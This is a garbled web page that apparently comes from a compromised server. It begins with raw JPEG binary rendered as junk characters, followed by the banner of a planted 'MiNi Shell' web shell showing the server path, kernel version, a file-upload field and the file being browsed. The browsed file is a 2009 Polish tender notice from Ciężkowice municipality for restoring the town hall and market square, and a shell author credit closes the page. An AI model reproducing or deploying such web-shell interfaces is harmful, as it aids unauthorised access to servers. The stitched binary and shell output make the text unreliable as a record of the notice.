JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090805/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090805/266452-N-2009.html

<p class="kh_header"><b>Ciężkowice: PRZYSTOSOWANIE ZABYTKOWEJ ARCHITEKTURY CENTRUM CIĘŻKOWIC DO CELÓW TURYSTYCZNYCH JAKO ELEMENTU MAŁOPOLSKIEGO DZIEDZICTWA HISTORYCZNEGO</b><br>
<b>Numer ogłoszenia: 266452 - 2009; data zamieszczenia: 05.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy w Ciężkowicach , ul. Tysiąclecia 19, 33-190 Ciężkowice, woj. małopolskie, tel. 14 6510051, faks 14 6510944.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ug@ciezkowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZYSTOSOWANIE ZABYTKOWEJ ARCHITEKTURY CENTRUM CIĘŻKOWIC DO CELÓW TURYSTYCZNYCH JAKO ELEMENTU MAŁOPOLSKIEGO DZIEDZICTWA HISTORYCZNEGO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem wykonania są  roboty  budowlane  związane  z  wykonaniem Przystosowania zabytkowej architektury centrum Ciężkowic do celów turystycznych jako elementu małopolskiego dziedzictwa historycznego  - Gmina Ciężkowice  w  zakresie obowiązującym:

A. Zakres rzeczowy prac przy budynku Ratusza uwzględnia wykonanie następujących robót:
A I. Zabezpieczenie ścian i posadzek przed wodami gruntowymi i opadowymi:
a1. Wykonanie izolacji poziomej ścian wewnętrznych i zewnętrznych metodą iniekcji ciśnieniowej na długości 295,5[m]
a2. Wykonanie izolacji pionowej ścian zewnętrznych na powierzchni 156,51[m2]
a3. Wykonanie kolektora deszczowego przejmującego wody opadowe z rynien dachu Ratusza o długości 133,1[m]
a4. Wykonanie izolacji poziomej pod posadzkami o pow. 431,08[m2]
A II. Zabezpieczenie ścian cokołu Ratusza przed rozwojem procesów grzybowych
a5. Skucie kilkunastocentymetrowej warstwy zaprawy cementowej i wyeksponowanie cokołu z piaskowca  na ścianach o pow. 225,64[m2]
A III. Zabezpieczenie przed dużymi stratami energetycznymi oraz poprawienie zjawiska osuszania ścian Ratusza
a6. Wymiana stolarki okiennej i drzwiowej o łącznej pow. 161,33[m2]
a7. Remont instalacji c.o. - 1 [kpl]
a8. Wymiana pokrycia dachowego o pow. 860,25 [m2]
A IV. Zabezpieczenie przed wyładowaniami atmosferycznymi
a9. Wykonanie instalacji odgromowej  - 1 [kpl]
A V. Zabezpieczenie przed pożarem
a10. Remont instalacji wod. - kan. wraz z wykonaniem 2 [szt] hydrantów p-poż. wewnętrznych - 1 [kpl]
A VI. Remont oświetlenia zewnętrznego Ratusza i płyty Rynku dla podkreślenia zabytkowego charakteru miasta.
a11. Remont wewnętrznej i zewnętrznej instalacji elektrycznej - 1 [kpl]
A VII. Prace poprawiające wizerunek budynku oraz walory architektoniczne
a12. Malowanie ścian wewnętrznych i zewnętrznych w tym odtworzenie tynków wew. i zew. odtworzenie sztukaterii o powierzchni 2183,1[m2] 
B. Zadania dotyczące płyty Rynku
B I. Zabezpieczenie płyty Rynku i ulic w obrębie rynku przed wodami opadowymi
b1. remont kanalizacji deszczowej o łącznej długości 564[m]
B II. Poprawa bezpieczeństwa mieszkańców i turystów przebywających na płycie Rynku
b2. Wykonanie nowej nawierzchni na płycie Rynku z kostki granitowej o pow. 3883,92[m2]
b3. Wykonanie nowych nawierzchni na chodnikach znajdujących się w obrębie płyty Rynku o powierzchni 1674,8 [m2]
B III. Prace poprawiające estetykę płyty Rynku po remoncie kanalizacji deszczowej i wykonaniu wymiany przyłącza wodnego do budynku Ratusza
b4. Wykonanie nowej nawierzchni asfaltowej na ulicach w Rynku o pow. 6915,2[m2]
b5. Konserwacja kamiennych murów oporowych o pow. 345,47[m2]
C. Zadania poprawiające walory wypoczynkowe i przyrodnicze płyty Rynku i otoczenia Ratusza
c1. Wycinka starych, chorych drzew i form krzewiastych - 98 [szt]
c2. Wykonanie nowych trawników o pow. 2738[m2]
c3. Sadzenie roślin liściastych - 1898 [szt]
c4. Montaż ławek parkowych  w ilości 20 [szt] 
c5. Montaż tablic informacyjnych w ilości 11[szt],.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.42.11.00-5, 45.32.00.00-6, 45.32.10.00-3, 45.30.00.00-0, 45.32.40.00-4, 45.10.00.00-8, 45.11.10.00-8, 45.11.12.13-4, 45.26.25.20-2, 45.26.10.00-4, 45.23.32.22-1, 45.23.24.52-5, 45.22.33.00-9, 45.32.10.00-3, 45.33.00.00-9, 45.33.11.00-7, 45.31.00.00-3, 45.33.30.00-0, 45.44.21.00-8, 45.11.27.10-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium w wysokości  150 000,00 zł ( sto pięćdziesiąt tysięcy złotych 00/100) powinno być wniesione w terminie do  dnia  07.09.2009 r. do  godz. 9.00.  Nie  wniesienie wadium w wymaganym terminie spowoduje odrzucenie oferty, zgodnie z Prawem zamówień publicznych.
Wadium wnoszone w pieniądzu powinno zostać przelane lub wpłacone na rachunek zamawiającego w banku:
Krakowski Bank  Spółdzielczy O/Ciężkowice Nr 09 8591 0007 0290 0000 2118 0020 z adnotacją:                               Wadium -  nr sprawy: G-341-3/09.


1a. Wadium może być wniesione w jednej z następujących form:

1.	w pieniądzu
2.	poręczeniach lub w poręczeniach  bankowych  lub  poręczeniach  spółdzielczej  kasy  oszczędnościowo - kredytowej,   z tym  że  zobowiązanie  kasy  jest  zawsze  poręczeniem  pieniężnym
3.	gwarancjach bankowych
4.	w gwarancjach ubezpieczeniowych
5.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b  ust  5 pkt. 2 ustawy z dnia 9 listopada 2000 o  utworzeniu PARP (Dz. U. z 2007 r  Nr 42 poz. 275)

Wykonawcy  którzy  zamierzają  wnieść  wadium  w  formie  innej  niż  pieniądz  powinni  złożyć  oryginał  dokumentu  potwierdzający  wniesienie  wadium  w  kasie Urzędu Gminy przed  terminem  składania  ofert.

Wadium  wnieść  można  w każdej  formie  wymienionej  w  pkt. 1.1a, 1) z  tym, że  dowód (kopię  potwierdzoną za  zgodność  z  oryginałem)  należy  umieścić  wewnątrz  oferty.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się  wykonawcy, którzy:

A. Posiadają uprawnienia niezbędne do wykonania zamówienia, jeżeli  ustawy  nakładają  obowiązek  posiadania  takich  uprawnień. 

Przedmiotowy warunek zostanie uznany za spełniony, jeżeli wykonawca  udokumentuje uprawnienia do występowania  w obrocie prawnym.

Ocena  tego warunku będzie dokonana  na  podstawie:

-aktualnego  odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy  przed upływem terminu składania ofert.
W  przypadku  występowania  pełnomocnika  należy  dołączyć  pełnomocnictwo  dla osób  podpisujących  ofertę  do podejmowania  zobowiązań  w  imieniu  firmy składającej  ofertę, o  ile  nie  wynikają  z  przepisów  prawa lub innych  dokumentów
-aktualnej  informacji  z  Krajowego  Rejestru  Karnego  w  zakresie  określonym  w  art. 24  ust. 1  pkt. 4-8  ustawy, wystawionej  nie  wcześniej  niż  6  miesięcy  przed  upływem  terminu  składania  ofert
-aktualnej  informacji  z  Krajowego  Rejestru  Karnego  w  zakresie  określonym  w  art. 24  ust. 1  pkt. 9  ustawy, wystawionej  nie  wcześniej  niż  6  miesięcy  przed  upływem  terminu  składania  ofert
-aktualnego  zaświadczenia  właściwego  naczelnika  urzędu  skarbowego  oraz  właściwego  oddziału  Zakładu Ubezpieczeń  Społecznych  lub  Kasy  Rolniczego  ubezpieczenia  Społecznego  potwierdzających  odpowiednio, że wykonawca  nie  zalega  z  opłacaniem  podatków, opłat  oraz  składek  na  ubezpieczenie  zdrowotne i  społeczne, lub  zaświadczeń, że  uzyskał  przewidziane  prawem  zwolnienie, odroczenie  lub  rozłożenie  na  raty  zaległych płatności  lub  wstrzymanie  w  całości  wykonania  decyzji  właściwego  organu wystawionych  nie  wcześniej niż  3  miesiące  przed  upływem  terminu  składania  ofert

B. Posiadają niezbędną wiedzę i doświadczenie  oraz  dysponują  potencjałem  technicznym  i  osobami  zdolnymi  do  wykonania  zamówienia. 

a) w  zakresie  wymaganego  doświadczenia - Zamawiający  wymaga, aby  wykonawca  wykazał  się  co  najmniej:

1 robotą   budowlaną   /jako  generalny  wykonawca/  wykonywaną  na  budynku  użyteczności  publicznej, zamieszkania  zbiorowego   budynku  mieszkalnym  wielorodzinnym, jednorodzinnym lub obiekcie zabytkowym polegającą  na  wykonaniu  prac remontowych ogólnobudowlanych  o  wartości   co  najmniej  1. 500.000,00  [zł]
2 robotami budowlanymi w zakresie zagospodarowania terenów publicznych ( położenie kostki brukowej lub  granitowej)  o powierzchni nie mniejszej niż 2.000,00[m2] ( dopuszcza się możliwość przedłożenia referencji przez podwykonawcę, który realizował będzie ten zakres robót) o wartości co najmniej 600.000,00[zł]
3 robotami budowlanymi w zakresie wykonania izolacji poziomej metodą iniekcji ciśnieniowej na obiektach zabytkowych ( dopuszcza się możliwość przedłożenia referencji przez podwykonawcę, który realizował będzie ten zakres robót) o wartości co najmniej 150.000,00[zł]
3  robotami budowlanymi w zakresie odnowienia elewacji budynku zabytkowego ( cokół kamienny + tynk renowacyjny + wykonanie malowania elewacji farbami renowacyjnymi) (dopuszcza się możliwość przedłożenia referencji przez podwykonawcę, który realizował będzie ten zakres robót) o wartości co najmniej 400.000,00[zł]
3 robotami w zakresie zagospodarowania terenów zieleni  ( dopuszcza się możliwość przedłożenia referencji przez podwykonawcę, który realizował będzie ten zakres robót) o wartości co najmniej 200.000,00[zł]
2 robotami w zakresie instalacji sanitarnych wewnętrznych i zewnętrznych / drenaż, kanalizacja sanitarna, burzowa  sieć wodociągowa/ ( dopuszcza się możliwość przedłożenia referencji przez podwykonawcę, który realizował będzie ten zakres robót)  o wartości co najmniej 200.000,00[zł]

Ocena  tego warunku będzie dokonana  na  podstawie:
wykazu  zrealizowanych   zamówień  publicznych  wykonanych  przez  wykonawcę  w  okresie  ostatnich  5  lat  przed  dniem  wszczęcia postępowania  o udzielenie  zamówienia  (ogłoszenie  w  BZP), a  jeżeli  okres  prowadzenia  działalności  jest krótszy - w tym  okresie, popartych  odpowiednimi  dokumentami, (referencje, opinie zamawiających, dla  których zamówienia  zostały  zrealizowane) 
Do  każdej  pozycji  wyszczególnionej  w  załączniku  nr  3  SIWZ  należy  załączyć  dokument  potwierdzający  należyte  wykonanie  zamówienia. 
Z  przedłożonego  dokumentu  jednoznacznie  ma  wynikać, że:
1. wykonawca, podwykonawca, uczestnik konsorcjum, zrealizował prace ogólno budowlane odpowiadające zakresowi zamówienia o wartości co najmniej 1.500.000,00[zł], z treści referencji ma wynikać jednoznacznie, że prace zostały wykonane z należytą starannością
2.Wykonawca, podwykonawca, uczestnik konsorcjum zrealizował 2 prace w zakresie zagospodarowania terenów publicznych odpowiadające zakresowi zamówienia o wartości co najmniej 600.000,00[zł], treści referencji ma wynikać jednoznacznie, że prace zostały wykonane z należytą starannością
3.Wykonawca/podwykonawca/uczestnik konsorcjum zrealizował 3 prace w zakresie wykonywania izolacji poziomej metodą iniekcji ciśnieniowej na obiektach zabytkowych odpowiadające zakresowi zamówienia o wartości co najmniej 150.000,00[zł], treści referencji ma wynikać jednoznacznie, że prace zostały wykonane z należytą starannością
4.Wykonawca, podwykonawca, uczestnik konsorcjum zrealizował 3 prace w zakresie odnowienia elewacji zewnętrznej na obiektach zabytkowych odpowiadające zakresowi zamówienia (cokół kamienny, tynk renowacyjny, malowanie renowacyjnymi farbami) o  wartości co najmniej 400.000,00[zł], z treści referencji ma wynikać jednoznacznie, że prace zostały wykonane z należytą starannością
5.Wykonawca, podwykonawca, uczestnik konsorcjum zrealizował 2 prace w zakresie instalacji sanitarnych wewnętrznych i zewnętrznych, drenaż, kanalizacja sanitarna, burzowa  sieć wodociągowa, odpowiadające zakresowi zamówienia o  wartości co najmniej 200.000,00[zł], z treści referencji ma wynikać jednoznacznie, że prace zostały wykonane z należytą starannością
6.Wykonawca, podwykonawca, uczestnik konsorcjum zrealizował 3 prace w zakresie zagospodarowania terenów zieleni odpowiadające zakresowi zamówienia o  wartości co najmniej 200.000,00[zł], z treści referencji ma wynikać jednoznacznie, że prace zostały wykonane z należytą starannością.

Z przedłożonych referencji ma jednoznacznie wynikać, kto był stroną zamawiającą, kto wystawił referencje, data ich wystawienia, kontakt z osobą która może potwierdzić zrealizowane prace, wartość wykonanych prac oraz formuła, ze prace zostały wykonane z należytą starannością.

b)  w  zakresie   dysponowania   osobami  zdolnymi   do  wykonania  zamówienia.- Zamawiający  wymaga, aby  wykonawca  dysponował:
- kierownikiem  budowy  posiadającym  uprawnienia  budowlane  w  specjalności  konstrukcyjno - budowlanej                     z  min. 10  letnim  doświadczeniem zawodowym  jako  kierownik  budowy (w przypadku prac związanych z wykonaniem izolacji poziomej, renowacji elewacji zewnętrznej budynku ratusza wymaga się aby kierownik - posiadał stosowne uprawnienia budowlane określone przepisami Prawa Budowlanego, jak również wykaże sie co najmniej 2-letnia praktyka na budowie przy zabytkach nieruchomych, bądź posiada uprawnienia do prowadzenia prac w obiektach zabytkowych potwierdzone stosownym zaświadczeniem Wojewódzkiego Konserwatora Zabytków, zgodnie z rozporządzeniem Ministra Kultury z dnia 9.06.2004 r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych (Dz.U. nr 150, poz. 1579), a ponadto jest członkiem właściwej izby samorządu zawodowego, zgodnie z ustawa o samorządach zawodowych)
- kierownikiem budowy posiadającym uprawnienia budowlane w specjalności instalacji sanitarnych wewnętrznych i zewnętrznych
- kierownikiem budowy posiadającym uprawnienia budowlane w zakresie instalacji elektrycznych 
- kadra kierownicza w każdym przypadku powinna posiadać aktualny wpis do właściwej izby samorządu zawodowego (Dz. U. nr 5/2001, poz. 42),
- posiadania  lub  dysponuje  odpowiednią  ilością  osób  (pracowników  fizycznych) zdolnych do  wykonania zamówienia  w  ilości  nie mniejszej  niż  15 osób

Ocena tego warunku będzie dokonana w oparciu o:

-uprawnienia  budowlane  kierownika budowy w specjalności konstrukcyjno - budowlanej,  wraz z aktualnym zaświadczeniem   o przynależności  do właściwej Izby Inżynierów Budownictwa. 
-uprawnienia budowlane kierownika w zakresie instalacji sanitarnych
-uprawnienia budowlane kierownika w zakresie instalacji elektrycznych 
-sporządzenia  wykazu  osób - podania  personelu  technicznego  który  będzie  wykonywać  zamówienie  lub  będzie uczestniczyć  w  wykonywaniu  zamówienia, wraz  z  informacjami  na  temat  ich  kwalifikacji  niezbędnych  do wykonania  zamówienia, a  także  wykonywanych  przez  nich  czynności., wykaz wykonywanych przez pracowników prac musi odpowiadać zakresowi zamówienia- załącznik  nr  4  SIWZ,


c) Znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia 

W  zakresie  wymaganej  sytuacji  ekonomicznej  i  finansowej  - Zamawiający  wymaga, aby  wykonawca :

-był  ubezpieczony  od  odpowiedzialności  cywilnej  w  zakresie  prowadzonej  działalności  gospodarczej  na  kwotę nie mniejszą  niż  2 000 000  PLN

Ocena tego warunku zostanie dokonania w oparciu o:

-polisę  lub  inny  dokument  ubezpieczenia  potwierdzający, że  wykonawca  jest  ubezpieczony od odpowiedzialności  cywilnej  w  zakresie  prowadzonej  działalności  gospodarczej,  


d)  Nie podlega wykluczeniu z postępowania na podstawie art. 24  ust. UPzp

Ocena tego warunku zostanie dokonania w oparciu o:

-wykaz  oświadczeń  zawartych  w  dokumencie  o nazwie Oświadczenie (załącznik nr 3) złożonych w trybie art. 22  ustawy.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W  zakresie  oświadczeń i dokumentów  potwierdzających  spełnienie  warunków  w  zakresie  posiadania uprawnień do wykonywania określonej działalności lub czynności oraz nie podleganiu wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych Wykonawca musi załączyć:
- wykaz oświadczeń, że wykonawca spełnia warunki udziału w postępowaniu określone w art. 22 ust. 1  i  że nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy Pzp - zgodnych z treścią  załącznika  nr 2 SIWZ.
- aktualny  odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 m - cy  przed upływem terminu składania ofert.

- aktualne  zaświadczenie  właściwego  naczelnika  urzędu  skarbowego  oraz  właściwego  oddziału  Zakładu Ubezpieczeń  Społecznych  lub  Kasy  Rolniczego  ubezpieczenia  Społecznego  potwierdzających  odpowiednio, że wykonawca  nie  zalega  z  opłacaniem  podatków, opłat  oraz  składek  na  ubezpieczenie  zdrowotne  i  społeczne, lub zaświadczenie, że  uzyskał  przewidziane  prawem  zwolnienie, odroczenie  lub  rozłożenie  na  raty  zaległych  płatności lub  wstrzymanie  w  całości  wykonania  decyzji  właściwego  organu - wystawione  nie  wcześniej  niż  3 miesiące  przed  upływem  terminu  składania  ofert
- aktualna  informacja  z  Krajowego  Rejestru  Karnego  w  zakresie  określonym  w  art. 24  ust. 1  pkt. 4-8  ustawy, wystawiona  nie  wcześniej  niż  6  miesięcy  przed  upływem  terminu  składania  ofert
- aktualna  informacja  z  Krajowego  Rejestru  Karnego  w  zakresie  określonym  w  art. 24  ust. 1  pkt. 9  ustawy, wystawiona  nie  wcześniej  niż  6  miesięcy  przed  upływem  terminu  składania  ofert

W  zakresie  dokumentów  potwierdzających  spełnienie  warunków  w  zakresie  posiadania przez Wykonawcę niezbędnej wiedzy i  doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia Wykonawca musi załączyć:
- wykaz  wykonanych   robót  budowlanych,  w okresie  ostatnich  pięciu lat przed  dniem  wszczęcia  postępowania                      o  udzielenie  zamówienia, a  jeżeli  okres  prowadzenia  działalności  jest  krótszy - w  tym  okresie, odpowiadających  swoim  rodzajem   i  wartością  robotom  budowlanym  stanowiącym  przedmiot  zamówienia z  podaniem  ich  wartości  oraz  daty  i  miejsca  wykonania,  oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie (z należytą starannością),
- wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie dysponował  Wykonawca; jeżeli Wykonawca wskaże w ww. wykazie narzędzia i urządzenia, którymi będzie dysponował, winien załączyć do oferty pisemne zobowiązanie innych podmiotów do ich udostępnienia, 
- wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia wraz z informacją na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, w razie wykazania osób, którymi Wykonawca będzie dysponował, należy załączyć pisemne zobowiązanie innych podmiotów do udostępnienia tych osób
- dokumentów stwierdzających, że  osoby  które  będą  uczestniczyć w wykonywaniu zamówienia  posiadają  wymagane  uprawnienia, jeżeli  ustawy  nakładają  obowiązek  posiadania  takich  uprawnień.                                                                                 
Należy  podać  wykaz  pracowników  nadzoru,  zawierający  potwierdzenie  wymaganych  kwalifikacji   i doświadczenia w  wykonywaniu  zamówień  jak  w  niniejszym  postępowaniu /załączyć  uprawnienia  budowlane  wraz  z   aktualnym  zaświadczeniem  o   przynależności  kierownika  budowy   do  właściwej  Izby  Samorządu Zawodowego/
- Zamawiający  żąda  aby Wykonawca przedstawił w  swojej  ofercie część zamówienia jaką zamierza powierzyć  podwykonawcom  -  załącznik  nr  6 SIWZ  

W  zakresie  dokumentów  potwierdzających  spełnienie  warunków  w  zakresie  znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, Wykonawca musi załączyć:    
- informację z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy w wysokości 2 000 000,00 zł, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert
- polisę, a w przypadku jej braku  inny  dokument  ubezpieczenia  potwierdzający, że  wykonawca  jest  ubezpieczony od odpowiedzialności  cywilnej  w  zakresie  prowadzonej  działalności  na kwotę nie mniejszą niż 2 000 000,00 zł

W  zakresie  dokumentów  potwierdzających  spełnienie  warunków  w  zakresie  wymaganego  doświadczenia i  potencjału  ludzkiego  oraz  zdolności  finansowej, Zamawiający  dopuszcza  możliwość  sumowania  potencjałów  wszystkich  wykonawców  wspólnie  ubiegających  się  o  zamówienie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.wrotamalopolski.pl/BIP/ciezkowice.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Ciężkowice
ul. Tysiąclecia 19
33-190 Ciężkowice, pok. nr 30.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.09.2009 godzina 09:00, miejsce: Urząd Gminy Ciężkowice
ul. Tysiąclecia 19
33-190 Ciężkowice, pok. nr 26.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com